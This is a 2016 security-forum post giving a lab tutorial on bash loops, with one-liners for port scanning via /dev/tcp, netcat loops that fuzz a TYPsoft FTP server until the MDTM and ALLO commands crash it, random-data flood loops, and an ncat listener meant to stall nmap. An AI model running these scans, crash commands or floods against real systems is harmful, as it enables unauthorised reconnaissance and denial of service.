August 21, 2017, 06:39:11 PM
Welcome, Guest. Please login or register.

CMFP (Certified Metasploit Framework Professional) Course is out! http://www.top-hat-sec.com/cmfp.html

Author Topic: FAST TRACK "For While Break Computer"  (Read 1760 times)

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
FAST TRACK "For While Break Computer"
« on: March 23, 2016, 10:50:09 AM »
I do not understand anything about computers in general too much perfection while nothing're perfect, that's my opinion but good.

I created a tutorial that I hope will permetre you to help in the use of loops and while.


FAST TRACK "For While Break Computer"


################################
SCRIPTING WITH FOR AND WHILE   #
################################

################################################################################################
MACHINE : PC XP (target) ; PC CRUNCHBANG++ (Attacker) ;                                                                    #
USED SOFTWARE :Unix/Linux $(for,while,wget,nc(netcat),convert);Windows$(TYPsoft FTP Server,Immunity Debugger or ollydbg ), #
ATTACKER OBJECTIF : Scan port with for and while and also fuzz + download with your for and create pdf                    #
################################################################################################

################################################################################################
#Configure XP Machine
In your XP machine or another windows system, download :
-https://sourceforge.net/projects/ftpserv/
-http://debugger.immunityinc.com/ID_register.py
or
-http://www.ollydbg.de/odbg200.zip




################################################################################################
#Configure Unix/Linux Machine
You must ensure that wget is installed (locate wget or which wget)
You must ensure that convert is installed if not (sudo apt-get install imagemagick)

################################################################################################

#START SCANNING FUZZING AND DOWNLOAD      #

###########################################
###FOR INTRO###

I wrote different command you can test, but for now I ll dessasembler control.

Test this command in your terminal

Code: [Select]
for memberstophatsec in {1..10}; <does not work
Code: [Select]
for memberstophatsec in {1..10};do echo $memberstophatsec <does not work
Code: [Select]
for memberstophatsec in {1..10};do echo $memberstophatsec ;done  <Yeah you  can look the variable memberstophatsec with the commande echo.


Code: [Select]
for memberstophatsec in user1 user2 user3 ;do echo $memberstophatsec;done
Code: [Select]
for memberstophatsec in {user,user}{1..3} age {20..60} ;do echo $memberstophatsec;done <does not work


Code: [Select]
for memberstophatsec in {user,user}{1001..1003}age{100..113}happybirthday ;do echo $memberstophatsec;done


###########################################
###FOR SCANNING###

Dessasembler control
We need to scanner :

SOCKET:?
IP:?
PORT:?

SOCKET:/dev/tcp/
IP:192.168.0.17/ = $ip
PORT:{21,2121} = $ip


Code: [Select]
for variable in yourip/{yourport,yourport};do (echo -e >/dev/tcp/$yourip) &>/dev/null && echo -e "\033[31m$yourip is OPEN\033[00m" ;done
Practice :

This command scans the IP 192.168.0.11 for 21 and 22 port to find out if there are open

Code: [Select]
for ip in 192.168.0.17/{21,2121};do (echo -e >/dev/tcp/$ip) &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ;done


This command scans the IP 192.168.0.0/24 for 22 and 80 port to find out if there are open and shows the port open and close

Code: [Select]
for ip in 192.168.0.{16..17}/{22,80,21};do echo -e >/dev/tcp/$ip &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ||  echo -e "\033[34m$ip is CLOSED\033[00m";done 


And add in the end of the commande | less wait scanning and  use arrow up for look the port open and closed

Code: [Select]
for ip in 192.168.0.{16..17}/{22,80,21};do echo -e >/dev/tcp/$ip &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ||  echo -e "\033[34m$ip is CLOSED\033[00m";done | less
This command scans the IP localhost for 1 to 1000 port to find out if there are open (very fast call system i like)
A you test different control :)

And add in the end of the commande " | less " wait scanning and  use arrow up in your keyboard for look the port open and closed






Try command :)

Code: [Select]
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done 
Code: [Select]
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done | less
Code: [Select]
for i in 192.168.0.{1..1000};do echo </dev/tcp/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code: [Select]
for i in {1..1000};do (echo </dev/tcp/127.0.0.1/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code: [Select]
for i in 192.168.0.{1..1000};do (echo </dev/tcp/127.0.0.1/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code: [Select]
for i in {1..1000};do (echo </dev/tcp/127.0.0.1/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" || echo -n ".";done
Code: [Select]
for i in 192.168.0.{1..254}/{22,80,443};do (echo </dev/tcp/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" || echo -n ".";done
Code: [Select]
for i in 192.168.0.{1..254}/{21,22,25,80,8080,443};do echo </dev/tcp/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done  <Very slow but useful in some cases
For the last command that can be useful in some cases to have a lot of "....." to see ports
Code: [Select]
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+] Open at \n...$i"; done
###########################################
###WHILE FOR FUZZING AND RECON###
Fuzzing ??
Lets go fuzzing
This is not a real bug, but I think .. it sere me explain as crash an application and use the command rfc.

TARGET=192.168.0.17
ATTACKER=192.168.0.12

Code: [Select]
for ip in 192.168.0.17/{21,2121};do (echo -e >/dev/tcp/$ip) &>/dev/null &&  echo -e "\033[31m$ip is OPEN\033[00m" ;done
Have look at what the server responds

Code: [Select]
cat </dev/tcp/192.168.0.17/21


Have can fetch the RFC command that can be useful in case certaint ...



Have can test the controls of a ftp example:

Code: [Select]
for i in CWD  XCWD CDUP XCUP SMNT* PORT PASV  EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD XRMD MKD  XMKD PWD  XPWD SIZE SYST HELP  NOOP FEAT OPTS AUTH CCC* CONF*   ENC* MIC*  PBSZ PROT TYPE STRU MODE RETR STOR STOU  APPE REST ABOR USER PASS ACCT*   REIN*   LIST  APPE REST ABOR USER PASS ACCT*   REIN*   LIST  NLST STAT SITE ;do /bin/echo $i|nc 192.168.0.17 21 $i;done
Code: [Select]
and Ctrl + c for next command

Look ftp server and Restart your ftp server




Nice from ALLO the ftp server crash


Look ftp server and Restart your ftp server


Code: [Select]
for i in CWD   ALLO* RNFR RNTO DELE MDTM  ;do /bin/echo $i|nc 192.168.0.17 21 $i;done


MDTM crash the ftp server okay i test, I tell the ctrl - c
Restart your ftp server
Code: [Select]
echo MDTM >/dev/tcp/192.168.0.17/21


Good MDTM crash app

#############################################################################################################
###Random FUZZ###Just For fun

Go have created a randum fuzzer in a line ..

Code: [Select]
while [ 1 ]; do cat /dev/urandom | nc vv target port; done



Showed that no matter what .. no crash ..but it can be useful sometimes

I want create pseudo command for crash my ftp or test
Exemple : ALLO =  4 ; RNFR = 4
I create loop while

I created a while loop that recovers the characters from A - Z of random and creates me an order of 4 Capital Letter that sends my FTP server

Code: [Select]
while [ 1 ]; do ( sleep 5 ) tr -dc 'A-Z' < /dev/urandom | fold -w 4|nc -vv 192.168.0.17 21; done







The crash ftp server but I think its a bit like an attack DDOS..or not? write RW ?
Im not an expert but it may be interesting to look further can be.

#############################################################################################################
###Exotic Command###Just For fun

echo is cool !
Code: [Select]
echo {1..100}


with | less





Here is another example

Code: [Select]
for i in ;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done
Code: [Select]
for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50;do echo </dev/tcp/127.0.1/$i && echo -e "\n[+]Open at \n$i"; done
Code: [Select]
for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done | less
Code: [Select]
for i in $(echo {1..100}) ;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done 
Code: [Select]
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done | less
To use the last command using the right and left arrow on your keyboard to view the open port.

Code: [Select]
for i in $(echo {1..100});do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+]Open at $i";done | less
------------------------------------
#############################################################################################################
###SlideShareDownloader###
#Objectif download image from slideshare and convert to pdf because we have no time to register us.

Create folder

mkdir MYIMAGE
cd /MYIMAGE



Open Your browser
http://fr.slideshare.net/codeblue_jp/seok-halee-enpub





Search value 1 or 2

Ok your are 50 page




Code: [Select]
for i in {1..50};do /usr/bin/wget http://image.slidesharecdn.com/seokhaleeenpub-140312044155-phpapp02/95/various-tricks-for-remote-linux-exploits-by-seokha-lee-wh1ant-$i-638.jpg?cb=1394624165; done




And convert your image in the pdf

You must ensure that convert is installed if not (sudo apt-get install imagemagick) ;)



Code: [Select]
convert * +compress various-tricks-for-remote-linux-exploits-by-seokha-lee-wh1ant.pdf




You have a nice pdf :)

Exercice for the next :

Code: [Select]
for i in {1..109};do /usr/bin/wget http://image.slidesharecdn.com/xxnen-151215110405/95/xxssnightmare-1-modeattack-xss-attacks-exploiting-xss-filter-$i-638.jpg?cb=1450272053;done

Cheat
browser + command for + wget and convert and you have your pdf
(if you have a curl command to retrieve the value I do not mind :) )

#############################################################################################################
###CRASH NMAP###
Bye bye nmap the light in the sea !!

start in root :
Code: [Select]
ncat -lkv -p 21 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom"
##
# Scan with nmap
Code: [Select]
nmap -sS -v -P0 -A 127.0.0.1
Its slow but you have not a crash :)

#Scan with your simple sycall scanner
Code: [Select]
for i in {1..30};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \t$i"; done | lessIts fast you have port !!!

###
#Exotic command for crash nmap

Step 1 Posted uppercase letters
Code: [Select]
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z' "
Code: [Select]
I run nc 127.0.0.1 8080 Nmap dont like letters humm nmap its slow



Step 2 4 letter of the word
Code: [Select]
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z'| fold -w 4"
Code: [Select]
I run nc 127.0.0.1 8080 nmap is very slow



Step 3 the lethal dose
Code: [Select]
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z'| fold -w 1000 "
Code: [Select]
Nmap is very very slow :)

Hight CPU :)


End.

KRAM KOMPUTER !!!

This is not necessarily technical but useful and good it helps

Thank for readme


Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 186
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: FAST TRACK "For While Break Computer"
« Reply #1 on: March 23, 2016, 01:56:54 PM »
*ears perk*
Did I just see...a crash??? <3
The quieter you become, the more you are unlikely to sound stupid.

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
Re: FAST TRACK "For While Break Computer"
« Reply #2 on: March 23, 2016, 03:07:02 PM »
Yes is the crash i write in the FTP server, oday free maybe ?..

« Last Edit: March 23, 2016, 03:08:35 PM by RedCor »